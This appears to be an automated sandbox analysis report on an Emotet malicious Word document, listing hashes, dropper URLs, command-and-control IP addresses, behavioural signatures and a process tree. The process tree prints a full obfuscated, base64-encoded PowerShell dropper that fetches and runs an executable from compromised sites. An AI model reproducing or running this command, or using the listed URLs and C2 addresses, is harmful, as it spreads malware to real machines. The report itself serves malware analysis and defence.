Analysis

  • max time kernel
    136s
  • max time network
    134s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    27-10-2020 15:26

General

  • Target

    emotet_e1_63ba733a424e0e8faca60800df859696e15df38315049068bc30c559f9230b5b_2020-10-27__152327744649._fpx.doc

  • Size

    164KB

  • MD5

    98c8436a64207c603fe83b9cf018db0a

  • SHA1

    2b6c534d72f69ca4cd92660774b3b3b9becbacdb

  • SHA256

    63ba733a424e0e8faca60800df859696e15df38315049068bc30c559f9230b5b

  • SHA512

    07c5b2df22d26a5b66555becf30719bafab7ac3841488d97bc73bbf18ef99a8bdcbef816d7768e2b9874b44d59107257c442fed2c8c954457dc064503f15d553

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://hashilife.com/sitepage/GY/

exe.dropper

http://anjia-ceramics.com/aliner-camper/K/

exe.dropper

https://monicasharma.info/reviewl/i/

exe.dropper

http://adidasyeezy.store/welph/m/

exe.dropper

http://econews.treegle.org/how-to/2V/

exe.dropper

http://quicktowtowing.com/wp-content/mu-plugins/uMM/

exe.dropper

https://timsonntag.com/cgi-bin/g/

Extracted

Family

emotet

Botnet

Epoch1

C2

78.206.229.130:80

104.131.92.244:8080

70.39.251.94:8080

87.230.25.43:8080

79.118.74.90:80

82.76.111.249:443

82.76.52.155:80

212.71.237.140:8080

188.251.213.180:80

103.236.179.162:80

1.226.84.243:8080

70.32.84.74:8080

2.84.12.98:80

201.213.177.139:80

177.73.0.98:443

170.81.48.2:80

129.232.220.11:8080

177.144.130.105:8080

213.52.74.198:80

120.72.18.91:80

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 2 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_63ba733a424e0e8faca60800df859696e15df38315049068bc30c559f9230b5b_2020-10-27__152327744649._fpx.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3980
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD IAAkADYANAAyAHcANQAgAD0AIAAgAFsAdAB5AHAARQBdACgAIgB7ADUAfQB7ADQAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADEAfQAiACAALQBGACcASQAnACwAJwBPAFIAeQAnACwAJwAuAGQAaQByAEUAYwBUACcALAAnAE8AJwAsACcAeQBzAHQAZQBtAC4AJwAsACcAcwAnACkAOwAgAFMARQBUAC0ASQBUAEUAbQAgAFYAYQByAGkAYQBiAGwAZQA6AEcAUgBRAG8AIAAgACgAWwBUAFkAcABlAF0AKAAiAHsAMwB9AHsAMgB9AHsAMQB9AHsAMAB9AHsANAB9AHsANQB9ACIAIAAtAGYAJwBUAC4AUwBFAFIAdgBJAGMARQBQAE8ASQBuAHQATQAnACwAJwBFACcALAAnAFQARQBtAC4ATgAnACwAJwBTAHkAUwAnACwAJwBhAE4AYQAnACwAJwBHAGUAUgAnACkAIAAgACkAIAA7ACQAQgBjAGUAeABjAG4AbgA9ACgAKAAnAFoAdQAnACsAJwBxADUAJwApACsAKAAnAHMAZAAnACsAJwBfACcAKQApADsAJABaAHEAbgBmAGEAOQA0AD0AJABWAF8AaQBqAGYANgByACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADMAcgBrAGIANwB3ADsAJABSAHkAZAAwADUAZwA3AD0AKAAnAFoAJwArACgAJwBmAHMAbAAnACsAJwBtAGgAJwArACcANQAnACkAKQA7ACAAIAAoACAAVgBhAFIAaQBhAGIATABFACAAIAAoACcANgA0ACcAKwAnADIAVwA1ACcAKQAgACAALQB2AEEAbAB1AEUAbwBuACAAKQA6ADoAIgBjAHIAZQBBAHQAZQBkAEkAYABSAEUAQwBUAGAAbwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQAnACsAJwBXAG4AdwByADYAMwBhAHsAMAB9ACcAKwAnAEoAJwArACcAbQAnACsAJwBrAHkAJwArACgAJwB4ACcAKwAnAGwAMwAnACkAKwAnAHsAMAB9ACcAKQAgAC0ARgAgAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAEkAdAA1AHgAZAB0AHQAPQAoACgAJwBQACcAKwAnAHAAeABsACcAKQArACgAJwA4ACcAKwAnAGMAcAAnACkAKQA7ACAAIAAoAGcAZQB0AC0AVgBhAHIAaQBhAEIAbABFACAAIABHAHIAcQBPACAAIAAtAHYAQQBMAHUARQBPAE4AIAAgACkAOgA6ACIAUwBgAGUAYABDAFUAUgBpAHQAWQBwAFIATwB0AE8AYwBvAEwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAxACcAKQArACcAMgAnACkAOwAkAFkAMgBmADUAYQBiADkAPQAoACgAJwBDADEAagAnACsAJwBhACcAKQArACgAJwBtACcAKwAnAGcAbgAnACkAKQA7ACQAUgB4ADkAYwB3ADMAbAAgAD0AIAAoACgAJwBZACcAKwAnAGgAOQAnACkAKwAoACcAcwBiACcAKwAnAF8AdwAnACsAJwBmAGYAJwApACkAOwAkAEoAbwB0AHYAdwA4ADIAPQAoACgAJwBKAHYAJwArACcAYgAnACkAKwAnAF8AJwArACgAJwBqACcAKwAnAGsAdwAnACkAKQA7ACQATgBuAGoAdAA2AHAAYwA9ACgAJwBKAHoAJwArACgAJwBmACcAKwAnADgAYgAnACkAKwAnADAAZgAnACkAOwAkAFUAcwA0AHAAagA3AGkAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBXAG4AJwArACgAJwB3AHIAJwArACcANgAnACkAKwAnADMAYQB7ACcAKwAnADAAJwArACcAfQBKACcAKwAnAG0AawB5AHgAbAAzAHsAMAB9ACcAKQAgACAALQBmACAAWwBjAEgAQQByAF0AOQAyACkAKwAkAFIAeAA5AGMAdwAzAGwAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFMAZQB6AHQAZgB0AGUAPQAoACcASAA5ACcAKwAnADQAJwArACgAJwAzADIAJwArACcAMAAwACcAKQApADsAJABDAGIAbABvADAAeQBoAD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlACcAKwAnAGMAdAAnACkAIABOAEUAdAAuAFcAZQBCAGMAbABJAEUATgBUADsAJABGAHcAbQAwAGsAdQBvAD0AKAAoACcAaAB0AHQAcAAnACsAJwA6ACcAKQArACcAWwAgACcAKwAoACcAdwBlACcAKwAnACAAXQBbACcAKQArACcAIAAnACsAKAAnAHcAZQAgAF0AaABhACcAKwAnAHMAJwArACcAaAAnACkAKwAnAGkAJwArACgAJwBsAGkAZgAnACsAJwBlAC4AYwBvAG0AWwAgACcAKwAnAHcAZQAgAF0AcwAnACsAJwBpAHQAJwApACsAKAAnAGUAcAAnACsAJwBhACcAKwAnAGcAZQBbACcAKQArACcAIAAnACsAJwB3ACcAKwAnAGUAJwArACgAJwAgAF0AJwArACcARwBZAFsAJwApACsAJwAgACcAKwAoACcAdwAnACsAJwBlACAAXQBAAGgAJwApACsAKAAnAHQAdABwACcAKwAnADoAWwAnACkAKwAnACAAJwArACcAdwAnACsAKAAnAGUAIAAnACsAJwBdAFsAIAAnACkAKwAoACcAdwAnACsAJwBlACAAJwApACsAJwBdAGEAJwArACcAbgAnACsAKAAnAGoAaQAnACsAJwBhACcAKQArACgAJwAtACcAKwAnAGMAZQAnACkAKwAnAHIAJwArACgAJwBhAG0AJwArACcAaQAnACkAKwAnAGMAJwArACcAcwAnACsAKAAnAC4AYwAnACsAJwBvACcAKwAnAG0AWwAgAHcAZQAgAF0AJwApACsAKAAnAGEAJwArACcAbABpACcAKQArACgAJwBuAGUAcgAnACsAJwAtAGMAJwApACsAKAAnAGEAbQBwAGUAcgAnACsAJwBbACcAKQArACcAIAAnACsAKAAnAHcAZQAgAF0ASwBbACcAKwAnACAAJwArACcAdwBlACAAJwApACsAJwBdACcAKwAoACcAQABoACcAKwAnAHQAdAAnACkAKwAnAHAAJwArACgAJwBzACcAKwAnADoAWwAnACkAKwAnACAAJwArACgAJwB3AGUAIAAnACsAJwBdAFsAIAAnACkAKwAnAHcAJwArACgAJwBlACcAKwAnACAAXQBtACcAKQArACcAbwAnACsAJwBuAGkAJwArACcAYwAnACsAKAAnAGEAcwAnACsAJwBoACcAKQArACcAYQByACcAKwAnAG0AYQAnACsAKAAnAC4AaQAnACsAJwBuAGYAJwApACsAJwBvACcAKwAoACcAWwAgACcAKwAnAHcAZQAgAF0AcgBlAHYAaQBlAHcAJwArACcAbAAnACkAKwAnAFsAIAAnACsAKAAnAHcAZQAnACsAJwAgACcAKQArACgAJwBdAGkAJwArACcAWwAgACcAKQArACcAdwBlACcAKwAnACAAXQAnACsAJwBAACcAKwAoACcAaAB0ACcAKwAnAHQAcAAnACkAKwAnADoAWwAnACsAKAAnACAAdwAnACsAJwBlACcAKQArACgAJwAgACcAKwAnAF0AWwAgACcAKQArACcAdwAnACsAKAAnAGUAJwArACcAIABdAGEAJwApACsAKAAnAGQAaQBkAGEAJwArACcAcwAnACkAKwAnAHkAJwArACgAJwBlAGUAJwArACcAegB5ACcAKwAnAC4AcwAnACkAKwAoACcAdABvACcAKwAnAHIAJwApACsAJwBlAFsAJwArACgAJwAgACcAKwAnAHcAZQAnACkAKwAoACcAIABdACcAKwAnAHcAZQAnACkAKwAoACcAbAAnACsAJwBwAGgAWwAnACkAKwAnACAAJwArACcAdwBlACcAKwAoACcAIAAnACsAJwBdAG0AJwApACsAJwBbACAAJwArACcAdwAnACsAKAAnAGUAJwArACcAIAAnACsAJwBdAEAAaAB0AHQAcAAnACsAJwA6ACcAKQArACcAWwAnACsAJwAgAHcAJwArACcAZQAgACcAKwAoACcAXQBbACAAdwBlACcAKwAnACAAXQAnACkAKwAoACcAZQBjAG8AbgAnACsAJwBlACcAKwAnAHcAcwAuAHQAJwApACsAJwByAGUAJwArACgAJwBlAGcAbAAnACsAJwBlAC4AJwApACsAKAAnAG8AcgAnACsAJwBnAFsAJwApACsAJwAgACcAKwAoACcAdwAnACsAJwBlACAAJwApACsAJwBdAGgAJwArACcAbwAnACsAKAAnAHcALQB0ACcAKwAnAG8AWwAnACkAKwAnACAAJwArACcAdwBlACcAKwAoACcAIABdADIAJwArACcAVgBbACcAKwAnACAAdwBlACAAJwApACsAJwBdACcAKwAoACcAQABoACcAKwAnAHQAJwApACsAJwB0ACcAKwAnAHAAOgAnACsAKAAnAFsAJwArACcAIAB3ACcAKQArACcAZQAgACcAKwAoACcAXQAnACsAJwBbACAAJwApACsAKAAnAHcAJwArACcAZQAgACcAKQArACgAJwBdAHEAJwArACcAdQBpAGMAJwApACsAJwBrAHQAJwArACcAbwAnACsAKAAnAHcAdAAnACsAJwBvAHcAJwApACsAJwBpACcAKwAnAG4AZwAnACsAKAAnAC4AJwArACcAYwBvAG0AWwAgAHcAZQAnACsAJwAgAF0AdwBwACcAKQArACcALQAnACsAKAAnAGMAbwBuAHQAZQAnACsAJwBuACcAKwAnAHQAWwAgAHcAZQAnACkAKwAnACAAXQAnACsAJwBtACcAKwAnAHUAJwArACcALQBwACcAKwAoACcAbAB1ACcAKwAnAGcAaQBuACcAKQArACgAJwBzAFsAIAB3AGUAJwArACcAIABdACcAKQArACgAJwB1ACcAKwAnAE0ATQAnACkAKwAnAFsAJwArACcAIAAnACsAJwB3ACcAKwAnAGUAJwArACgAJwAgAF0AJwArACcAQABoACcAKQArACgAJwB0AHQAcAAnACsAJwBzADoAWwAnACsAJwAgAHcAZQAnACkAKwAoACcAIAAnACsAJwBdAFsAIAB3AGUAIABdAHQAJwArACcAaQAnACkAKwAoACcAbQBzAG8AJwArACcAbgBuAHQAJwApACsAKAAnAGEAZwAuACcAKwAnAGMAJwApACsAJwBvAG0AJwArACgAJwBbACAAdwAnACsAJwBlACcAKQArACgAJwAgAF0AYwAnACsAJwBnACcAKQArACcAaQAnACsAKAAnAC0AYgBpAG4AJwArACcAWwAgAHcAZQAnACsAJwAgACcAKwAnAF0AJwApACsAKAAnAGcAJwArACcAWwAgACcAKQArACgAJwB3AGUAJwArACcAIABdACcAKQApAC4AIgByAEUAUABsAGAAQQBDAEUAIgAoACgAJwBbACAAJwArACgAJwB3ACcAKwAnAGUAIABdACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACcAZgBzACcAKQBbADAAXQApAC4AIgBTAHAAYABsAGkAVAAiACgAJABYADgAcQBpADgAdwBiACAAKwAgACQAWgBxAG4AZgBhADkANAAgACsAIAAkAEkAeQBpADkAMwA1AG4AKQA7ACQATABiAGsAZgB3AGQAXwA9ACgAJwBHADgAJwArACgAJwBqADgAJwArACcAeAAnACkAKwAnAGsAZQAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEwAbgBvAHYAeABmAGgAIABpAG4AIAAkAEYAdwBtADAAawB1AG8AKQB7AHQAcgB5AHsAJABDAGIAbABvADAAeQBoAC4AIgBkAG8AYABXAE4ATABvAGAAQQBkAGYASQBMAGUAIgAoACQATABuAG8AdgB4AGYAaAAsACAAJABVAHMANABwAGoANwBpACkAOwAkAFQAcwBhAGUAdAA4AGUAPQAoACgAJwBCACcAKwAnADMAaAAnACkAKwAoACcAcgAnACsAJwBrAGcAJwApACsAJwB1ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABVAHMANABwAGoANwBpACkALgAiAGwARQBOAGAAZwBUAEgAIgAgAC0AZwBlACAAMwA4ADgANwA3ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwAnACsAKAAnAGkAbgAnACsAJwAzADIAXwBQACcAKQArACgAJwByAG8AJwArACcAYwAnACkAKwAoACcAZQAnACsAJwBzAHMAJwApACkAKQAuACIAQwByAGUAYABBAFQAZQAiACgAJABVAHMANABwAGoANwBpACkAOwAkAEsAbQB6AHkANABiADQAPQAoACcATABfACcAKwAnAF8AJwArACgAJwBuAGYAJwArACcAbABiACcAKQApADsAYgByAGUAYQBrADsAJABWAGcAawA1AGkANwB0AD0AKAAnAEYAJwArACgAJwBjADYAOAAnACsAJwB0AHoAYwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVgBtAGgAOQBxADIAOQA9ACgAJwBGAGkAJwArACcAYwA5ACcAKwAoACcAZQAxACcAKwAnADkAJwApACkA
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1548
  • C:\Users\Admin\Wnwr63a\Jmkyxl3\Yh9sb_wff.exe
    C:\Users\Admin\Wnwr63a\Jmkyxl3\Yh9sb_wff.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3772
    • C:\Windows\SysWOW64\mferror\bcastdvr.proxy.exe
      "C:\Windows\SysWOW64\mferror\bcastdvr.proxy.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:1444

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\Wnwr63a\Jmkyxl3\Yh9sb_wff.exe
    MD5

    3640717230ef869d9c602176b19a5d15

    SHA1

    4b0a18e0d3fb215cf2e8dec607b24bcf4f9bf82c

    SHA256

    c1b93ced1b6f70e7bcd4ddbf20d7e2e68890afe75e1b6190d9740851b9168083

    SHA512

    18ddf8597c970ed0d9d208090e64b5b9f44243974d695f6eb8dc483621cd79f288d0116dab19103c883bea1f1835272f4027a789308668a79a769c94ab184e8b

  • C:\Users\Admin\Wnwr63a\Jmkyxl3\Yh9sb_wff.exe
    MD5

    3640717230ef869d9c602176b19a5d15

    SHA1

    4b0a18e0d3fb215cf2e8dec607b24bcf4f9bf82c

    SHA256

    c1b93ced1b6f70e7bcd4ddbf20d7e2e68890afe75e1b6190d9740851b9168083

    SHA512

    18ddf8597c970ed0d9d208090e64b5b9f44243974d695f6eb8dc483621cd79f288d0116dab19103c883bea1f1835272f4027a789308668a79a769c94ab184e8b

  • C:\Windows\SysWOW64\mferror\bcastdvr.proxy.exe
    MD5

    3640717230ef869d9c602176b19a5d15

    SHA1

    4b0a18e0d3fb215cf2e8dec607b24bcf4f9bf82c

    SHA256

    c1b93ced1b6f70e7bcd4ddbf20d7e2e68890afe75e1b6190d9740851b9168083

    SHA512

    18ddf8597c970ed0d9d208090e64b5b9f44243974d695f6eb8dc483621cd79f288d0116dab19103c883bea1f1835272f4027a789308668a79a769c94ab184e8b

  • memory/1444-16-0x0000000000000000-mapping.dmp
  • memory/1444-21-0x00000000033B0000-0x00000000033C0000-memory.dmp
    Filesize

    64KB

  • memory/1548-7-0x00007FFBD7460000-0x00007FFBD7E4C000-memory.dmp
    Filesize

    9.9MB

  • memory/1548-8-0x0000021BD1D00000-0x0000021BD1D01000-memory.dmp
    Filesize

    4KB

  • memory/1548-9-0x0000021BD20D0000-0x0000021BD20D1000-memory.dmp
    Filesize

    4KB

  • memory/3772-15-0x00000000034F0000-0x0000000003500000-memory.dmp
    Filesize

    64KB

  • memory/3980-0-0x00007FFBDEA70000-0x00007FFBDF0A7000-memory.dmp
    Filesize

    6.2MB

  • memory/3980-4-0x000002574363A000-0x000002574363F000-memory.dmp
    Filesize

    20KB